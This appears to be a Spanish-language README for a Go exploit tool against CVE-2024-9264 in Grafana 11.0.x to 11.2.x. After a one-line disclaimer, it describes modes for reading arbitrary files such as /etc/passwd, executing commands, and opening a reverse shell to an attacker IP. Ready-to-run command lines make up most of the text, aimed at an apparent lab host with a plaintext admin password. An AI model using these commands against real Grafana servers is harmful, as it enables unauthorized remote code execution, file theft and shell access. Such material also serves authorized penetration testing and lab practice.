
Una implementación en Go para CVE-2024-9264 que afecta a las versiones de Grafana 11.0.x, 11.1.x y 11.2.x.
Herramienta de exploit para CVE-2024-9264, una vulnerabilidad crítica en Grafana que permite a un atacante autenticado ejecutar una consulta SQL que lleva a RCE
🛡️ Esta herramienta es estrictamente para fines educativos y pruebas de penetración autorizadas.
El uso no autorizado es ilegal y poco ético.
CVE-2024-9264 es una falla crítica en Grafana que permite a un atacante autenticado ejecutar comandos SQL que llevan a RCE y lectura de archivos
file – Leer archivos arbitrarios (ej. /etc/passwd)shell – Shell reversa a la máquina del atacantecommand – Ejecutar comandos arbitrarios (ej. whoami)
No todos los argumentos son necesarios.
go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'
go run main.go [flags]